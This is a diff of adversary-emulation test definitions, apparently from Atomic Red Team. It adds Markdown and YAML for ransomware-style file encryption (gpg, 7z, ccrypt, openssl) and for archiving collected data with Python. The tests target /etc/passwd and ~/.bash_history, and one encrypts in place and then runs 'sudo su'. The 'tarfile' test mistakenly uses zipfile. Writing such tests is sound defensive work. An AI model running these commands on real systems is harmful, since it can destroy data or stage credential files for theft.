+<blockquote>Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017)
+
+To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Encrypt files using gpg (Linux)](#atomic-test-1---encrypt-files-using-gpg-linux)
+
+- [Atomic Test #2 - Encrypt files using 7z (Linux)](#atomic-test-2---encrypt-files-using-7z-linux)
+
+- [Atomic Test #3 - Encrypt files using ccrypt (Linux)](#atomic-test-3---encrypt-files-using-ccrypt-linux)
+
+- [Atomic Test #4 - Encrypt files using openssl (Linux)](#atomic-test-4---encrypt-files-using-openssl-linux)
+
+
+<br/>
+
+## Atomic Test #1 - Encrypt files using gpg (Linux)
+Uses gpg to encrypt a file
+
+**Supported Platforms:** Linux
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| pwd_for_encrypted_file | the password that you want for the encrypted file | String | passwd|
+| encrypted_file_path | path to the encrypted file | Path | /tmp/passwd.gpg|
+| input_file_path | path to the file that you want to encrypt | Path | /etc/passwd|
+| encryption_alg | encryption algorithm of the file | String | AES-256|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+echo "#{pwd_for_encrypted_file}" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path}
+```
+
+#### Cleanup Commands:
+```bash
+rm #{encrypted_file_path}
+```
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: Finds where gpg is located
+##### Check Prereq Commands:
+```bash
+which_gpg=`which gpg` 
+```
+##### Get Prereq Commands:
+```bash
+
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Encrypt files using 7z (Linux)
+Uses 7z to encrypt a file
+
+**Supported Platforms:** Linux
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| pwd_for_encrypted_file | the password that you want for the encrypted file | String | passwd|
+| encrypted_file_path | path to the encrypted file | Path | /tmp/passwd.zip|
+| input_file_path | path to the file that you want to encrypt | Path | /etc/passwd|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+$which_7z a -p#{pwd_for_encrypted_file} #{encrypted_file_path} #{input_file_path}
+```
+
+#### Cleanup Commands:
+```bash
+$which_7z e #{encrypted_file_path}
+rm #{encrypted_file_path}
+```
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: Finds where 7z is located
+##### Check Prereq Commands:
+```bash
+which_7z=`which 7z` 
+```
+##### Get Prereq Commands:
+```bash
+
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Encrypt files using ccrypt (Linux)
+Attempts to encrypt data on target systems as root to simulate an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user's home directory.
+
+**Supported Platforms:** Linux
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| cped_file_path | path where you want your copied file to be | Path | /tmp/passwd|
+| root_input_file_path | path to the file that you want to be encrypted if you are root user | Path | /etc/passwd|
+| user_input_file_path | path to file that you want to be encrypted if you are normal user | Path | ~/.bash_history|
+| impact_command | command to show impact of encryption | String | sudo su|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+if [[ $USER == "root" ]]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; #{impact_command}; else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi
+```
+
+#### Cleanup Commands:
+```bash
+if [[ $USER == "root" ]]; then mv #{cped_file_path} #{root_input_file_path}; else cp #{cped_file_path} #{user_input_file_path}; fi
+```
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: Finds where ccencrypt and ccdecrypt is located and copies input file
+##### Check Prereq Commands:
+```bash
+which_ccencrypt=`which ccencrypt`
+which_ccdecrypt=`which ccdecrypt`
+if [[ $USER == "root" ]]; then cp #{root_input_file_path} #{cped_file_path}; else cp #{user_input_file_path} #{cped_file_path}; fi 
+```
+##### Get Prereq Commands:
+```bash
+
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Encrypt files using openssl (Linux)
+Uses openssl to encrypt a file
+
+**Supported Platforms:** Linux
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| private_key_path | path to the private key | Path | /tmp/key.pem|
+| public_key_path | path to the public key | Path | /tmp/pub.pem|
+| encryption_bit_size | size of the bit of encryption | Integer | 2048|
+| encrypted_file_path | path to the encrypted file | Path | /tmp/passwd.zip|
+| input_file_path | path to the file that you want to encrypt | Path | /etc/passwd|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+$which_openssl genrsa -out #{private_key_path} #{encryption_bit_size}
+$which_openssl rsa -in #{private_key_path} -pubout -out #{public_key_path}
+$which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in #{input_file_path} -out #{encrypted_file_path}
+```
+
+#### Cleanup Commands:
+```bash
+$which_openssl rsautl -decrypt -inkey #{private_key_path} -in #{encrypted_file_path}
+rm #{encrypted_file_path}
+```
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: Finds where openssl is located
+##### Check Prereq Commands:
+```bash
+which_openssl=`which openssl` 
+```
+##### Get Prereq Commands:
+```bash
+
+```
+
+
+
+
+<br/>

atomics/T1486/T1486.yaml

@@ -0,0 +1,164 @@
+attack_technique: T1486
+display_name: Data Encrypted for Impact
+
+atomic_tests:
+- name: Encrypt files using gpg (Linux)
+  auto_generated_guid: 7b8ce084-3922-4618-8d22-95f996173765
+  description: |
+    Uses gpg to encrypt a file
+  supported_platforms:
+    - linux
+  input_arguments:
+    pwd_for_encrypted_file:
+      description: the password that you want for the encrypted file
+      type: String
+      default: passwd
+    encrypted_file_path:
+      description: path to the encrypted file
+      type: Path
+      default: /tmp/passwd.gpg
+    input_file_path:
+      description: path to the file that you want to encrypt
+      type: Path
+      default: /etc/passwd
+    encryption_alg:
+      description: encryption algorithm of the file
+      type: String
+      default: AES-256
+  dependency_executor_name: bash
+  dependencies:
+    - description: |
+        Finds where gpg is located
+      prereq_command: |
+        which_gpg=`which gpg`
+      get_prereq_command: |
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      echo "#{pwd_for_encrypted_file}" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path}
+    cleanup_command: |
+      rm #{encrypted_file_path}
+
+
+- name: Encrypt files using 7z (Linux)
+  auto_generated_guid: 53e6735a-4727-44cc-b35b-237682a151ad
+  description: |
+    Uses 7z to encrypt a file
+  supported_platforms:
+    - linux
+  input_arguments:
+    pwd_for_encrypted_file:
+      description: the password that you want for the encrypted file
+      type: String
+      default: passwd
+    encrypted_file_path:
+      description: path to the encrypted file
+      type: Path
+      default: /tmp/passwd.zip
+    input_file_path:
+      description: path to the file that you want to encrypt
+      type: Path
+      default: /etc/passwd
+  dependency_executor_name: bash
+  dependencies:
+    - description: |
+        Finds where 7z is located
+      prereq_command: |
+        which_7z=`which 7z`
+      get_prereq_command: |
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      $which_7z a -p#{pwd_for_encrypted_file} #{encrypted_file_path} #{input_file_path}
+    cleanup_command: |
+      $which_7z e #{encrypted_file_path}
+      rm #{encrypted_file_path}
+
+
+- name: Encrypt files using ccrypt (Linux)
+  auto_generated_guid: 08cbf59f-85da-4369-a5f4-049cffd7709f
+  description: |
+      Attempts to encrypt data on target systems as root to simulate an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user's home directory.
+  supported_platforms:
+    - linux
+  input_arguments:
+    cped_file_path:
+      description: path where you want your copied file to be
+      type: Path
+      default: /tmp/passwd
+    root_input_file_path:
+      description: path to the file that you want to be encrypted if you are root user
+      type: Path
+      default: /etc/passwd
+    user_input_file_path:
+      description: path to file that you want to be encrypted if you are normal user
+      type: Path
+      default: ~/.bash_history
+    impact_command:
+      description: command to show impact of encryption
+      type: String
+      default: sudo su
+  dependency_executor_name: bash
+  dependencies:
+    - description: |
+        Finds where ccencrypt and ccdecrypt is located and copies input file
+      prereq_command: |
+        which_ccencrypt=`which ccencrypt`
+        which_ccdecrypt=`which ccdecrypt`
+        if [[ $USER == "root" ]]; then cp #{root_input_file_path} #{cped_file_path}; else cp #{user_input_file_path} #{cped_file_path}; fi
+      get_prereq_command: |
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      if [[ $USER == "root" ]]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; #{impact_command}; else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi
+    cleanup_command: |
+      if [[ $USER == "root" ]]; then mv #{cped_file_path} #{root_input_file_path}; else cp #{cped_file_path} #{user_input_file_path}; fi 
+
+
+- name: Encrypt files using openssl (Linux)
+  auto_generated_guid: 142752dc-ca71-443b-9359-cf6f497315f1
+  description: |
+    Uses openssl to encrypt a file
+  supported_platforms:
+    - linux
+  input_arguments:
+    private_key_path:
+      description: path to the private key
+      type: Path
+      default: /tmp/key.pem
+    public_key_path:
+      description: path to the public key
+      type: Path
+      default: /tmp/pub.pem
+    encryption_bit_size:
+      description: size of the bit of encryption
+      type: Integer
+      default: 2048
+    encrypted_file_path:
+      description: path to the encrypted file
+      type: Path
+      default: /tmp/passwd.zip
+    input_file_path:
+      description: path to the file that you want to encrypt
+      type: Path
+      default: /etc/passwd 
+  dependency_executor_name: bash
+  dependencies:
+    - description: |
+        Finds where openssl is located
+      prereq_command: |
+        which_openssl=`which openssl`
+      get_prereq_command: |
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      $which_openssl genrsa -out #{private_key_path} #{encryption_bit_size}
+      $which_openssl rsa -in #{private_key_path} -pubout -out #{public_key_path}
+      $which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in #{input_file_path} -out #{encrypted_file_path}
+    cleanup_command: |
+      $which_openssl rsautl -decrypt -inkey #{private_key_path} -in #{encrypted_file_path}
+      rm #{encrypted_file_path}

atomics/T1560.002/T1560.002.md

@@ -0,0 +1,201 @@
+# T1560.002 - Archive via Library
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1560/002)
+<blockquote>An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
+
+Some archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Compressing data using GZip in Python (Linux)](#atomic-test-1---compressing-data-using-gzip-in-python-linux)
+
+- [Atomic Test #2 - Compressing data using bz2 in Python (Linux)](#atomic-test-2---compressing-data-using-bz2-in-python-linux)
+
+- [Atomic Test #3 - Compressing data using zipfile in Python (Linux)](#atomic-test-3---compressing-data-using-zipfile-in-python-linux)
+
+- [Atomic Test #4 - Compressing data using tarfile in Python (Linux)](#atomic-test-4---compressing-data-using-tarfile-in-python-linux)
+
+
+<br/>
+
+## Atomic Test #1 - Compressing data using GZip in Python (Linux)
+Uses GZip from Python to compress files
+
+**Supported Platforms:** Linux
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| path_to_input_file | Path to the file that you want to compress | Path | /etc/passwd|
+| path_to_output_file | Path of the file that you want your .gz file to be | Path | /tmp/passwd.gz|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+$which_python -c "import gzip;input_file=open('#{path_to_input_file}', 'rb');content=input_file.read();input_file.close();output_file=gzip.GzipFile('#{path_to_output_file}','wb','compresslevel=6');output_file.write(content);output_file.close();"
+```
+
+#### Cleanup Commands:
+```bash
+rm #{path_to_output_file}
+```
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: Requires Python
+##### Check Prereq Commands:
+```bash
+which_python=`which python`; $which_python -V 
+```
+##### Get Prereq Commands:
+```bash
+
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Compressing data using bz2 in Python (Linux)
+Uses bz2 from Python to compress files
+
+**Supported Platforms:** Linux
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| path_to_input_file | Path to the file that you want to compress | Path | /etc/passwd|
+| path_to_output_file | Path of the file that you want your .bz2 file to be | Path | /tmp/passwd.bz2|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+$which_python -c "import bz2;input_file=open('#{path_to_input_file}','rb');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open('#{path_to_output_file}','w+');output_file.write(bz2content);output_file.close();"
+```
+
+#### Cleanup Commands:
+```bash
+rm #{path_to_output_file}
+```
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: Requires Python
+##### Check Prereq Commands:
+```bash
+which_python=`which python`; $which_python -V 
+```
+##### Get Prereq Commands:
+```bash
+
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Compressing data using zipfile in Python (Linux)
+Uses zipfile from Python to compress files
+
+**Supported Platforms:** Linux
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| path_to_input_file | Path to the file that you want to compress | Path | /etc/passwd|
+| path_to_output_file | Path of the file that you want your .zip file to be | Path | /tmp/passwd.zip|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+$which_python -c "from zipfile import ZipFile; ZipFile('#{path_to_output_file}', mode='w').write('#{path_to_input_file}')"
+```
+
+#### Cleanup Commands:
+```bash
+rm #{path_to_output_file}
+```
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: Requires Python
+##### Check Prereq Commands:
+```bash
+which_python=`which python`; $which_python -V 
+```
+##### Get Prereq Commands:
+```bash
+
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Compressing data using tarfile in Python (Linux)
+Uses tarfile from Python to compress files
+
+**Supported Platforms:** Linux
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| path_to_input_file | Path to the file that you want to compress | Path | /etc/passwd|
+| path_to_output_file | Path of the file that you want your .tar.gz file to be | Path | /tmp/passwd.tar.gz|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+$which_python -c "from zipfile import ZipFile; ZipFile('#{path_to_output_file}', mode='w').write('#{path_to_input_file}')"
+```
+
+#### Cleanup Commands:
+```bash
+rm #{path_to_output_file}
+```
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: Requires Python
+##### Check Prereq Commands:
+```bash
+which_python=`which python`; $which_python -V 
+```
+##### Get Prereq Commands:
+```bash
+
+```
+
+
+
+
+<br/>

atomics/T1560.002/T1560.002.yaml

@@ -0,0 +1,120 @@
+attack_technique: T1560.002
+display_name: 'Archive Collected Data: Archive via Library'
+
+atomic_tests:
+- name: Compressing data using GZip in Python (Linux)
+  auto_generated_guid: 391f5298-b12d-4636-8482-35d9c17d53a8
+  description: |
+    Uses GZip from Python to compress files
+  supported_platforms:
+    - linux
+  input_arguments:
+    path_to_input_file:
+      description: Path to the file that you want to compress
+      type: Path
+      default: /etc/passwd
+    path_to_output_file:
+      description: Path of the file that you want your .gz file to be
+      type: Path
+      default: /tmp/passwd.gz
+  dependency_executor_name: bash
+  dependencies:
+    - description: |
+        Requires Python
+      prereq_command: |
+        which_python=`which python`; $which_python -V
+      get_prereq_command: |
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      $which_python -c "import gzip;input_file=open('#{path_to_input_file}', 'rb');content=input_file.read();input_file.close();output_file=gzip.GzipFile('#{path_to_output_file}','wb','compresslevel=6');output_file.write(content);output_file.close();"
+    cleanup_command: |
+      rm #{path_to_output_file}
+- name: Compressing data using bz2 in Python (Linux)
+  auto_generated_guid: c75612b2-9de0-4d7c-879c-10d7b077072d
+  description: |
+    Uses bz2 from Python to compress files
+  supported_platforms:
+    - linux
+  input_arguments:
+    path_to_input_file:
+      description: Path to the file that you want to compress
+      type: Path
+      default: /etc/passwd
+    path_to_output_file:
+      description: Path of the file that you want your .bz2 file to be
+      type: Path
+      default: /tmp/passwd.bz2
+  dependency_executor_name: bash
+  dependencies:
+    - description: |
+        Requires Python
+      prereq_command: |
+        which_python=`which python`; $which_python -V
+      get_prereq_command: | 
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      $which_python -c "import bz2;input_file=open('#{path_to_input_file}','rb');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open('#{path_to_output_file}','w+');output_file.write(bz2content);output_file.close();"
+    cleanup_command: |
+      rm #{path_to_output_file}
+- name: Compressing data using zipfile in Python (Linux)
+  auto_generated_guid: 001a042b-859f-44d9-bf81-fd1c4e2200b0
+  description: |
+    Uses zipfile from Python to compress files
+  supported_platforms:
+    - linux
+  input_arguments:
+    path_to_input_file:
+      description: Path to the file that you want to compress
+      type: Path
+      default: /etc/passwd
+    path_to_output_file:
+      description: Path of the file that you want your .zip file to be
+      type: Path
+      default: /tmp/passwd.zip
+  dependency_executor_name: bash
+  dependencies:
+    - description: |
+        Requires Python
+      prereq_command: |
+        which_python=`which python`; $which_python -V
+      get_prereq_command: |
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      $which_python -c "from zipfile import ZipFile; ZipFile('#{path_to_output_file}', mode='w').write('#{path_to_input_file}')"
+    cleanup_command: |
+      rm #{path_to_output_file}
+- name: Compressing data using tarfile in Python (Linux)
+  auto_generated_guid: e86f1b4b-fcc1-4a2a-ae10-b49da01458db
+  description: |
+    Uses tarfile from Python to compress files
+  supported_platforms:
+    - linux
+  input_arguments:
+    path_to_input_file:
+      description: Path to the file that you want to compress
+      type: Path
+      default: /etc/passwd
+    path_to_output_file:
+      description: Path of the file that you want your .tar.gz file to be
+      type: Path
+      default: /tmp/passwd.tar.gz
+  dependency_executor_name: bash
+  dependencies:
+    - description: |
+        Requires Python
+      prereq_command: |
+        which_python=`which python`; $which_python -V
+      get_prereq_command: |
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      $which_python -c "from zipfile import ZipFile; ZipFile('#{path_to_output_file}', mode='w').write('#{path_to_input_file}')" 
+    cleanup_command: |
+      rm #{path_to_output_file}

atomics/used_guids.txt

@@ -679,3 +679,16 @@ d34ef297-f178-4462-871e-9ce618d44e50
 ff1d8c25-2aa4-4f18-a425-fede4a41ee88
 30558d53-9d76-41c4-9267-a7bd5184bed36ca45b04-9f15-4424-b9d3-84a217285a5c
 e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b
+3a95cdb2-c6ea-4761-b24e-02b71889b8bb
+6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
+0b44d79b-570a-4b27-a31f-3bf2156e5eaa
+7b8ce084-3922-4618-8d22-95f996173765
+53e6735a-4727-44cc-b35b-237682a151ad
+08cbf59f-85da-4369-a5f4-049cffd7709f
+142752dc-ca71-443b-9359-cf6f497315f1
+391f5298-b12d-4636-8482-35d9c17d53a8
+c75612b2-9de0-4d7c-879c-10d7b077072d
+001a042b-859f-44d9-bf81-fd1c4e2200b0
+e86f1b4b-fcc1-4a2a-ae10-b49da01458db
+10447c83-fc38-462a-a936-5102363b1c43
+fcbdd43f-f4ad-42d5-98f3-0218097e2720